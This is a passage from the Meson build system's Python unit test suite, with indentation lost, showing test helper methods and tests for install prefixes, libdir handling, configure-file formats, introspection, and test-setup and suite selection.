self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix]
if self.libdir:
args += ['--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
with mock.patch.dict(os.environ, override_envvars):
run_mtest_inprocess(['-C', self.builddir])
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def get_meson_log_sanitychecks(self):
'''
Same as above, but for the sanity checks that were run
'''
log = self.get_meson_log()
prefix = 'Sanity check compiler command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats(confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
# Key error as they do not exists
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False, 'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True, 'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value', 'description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10, 'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value', 'description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
# Handles meson format exceptions
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'], 'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_force_fallback_for(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
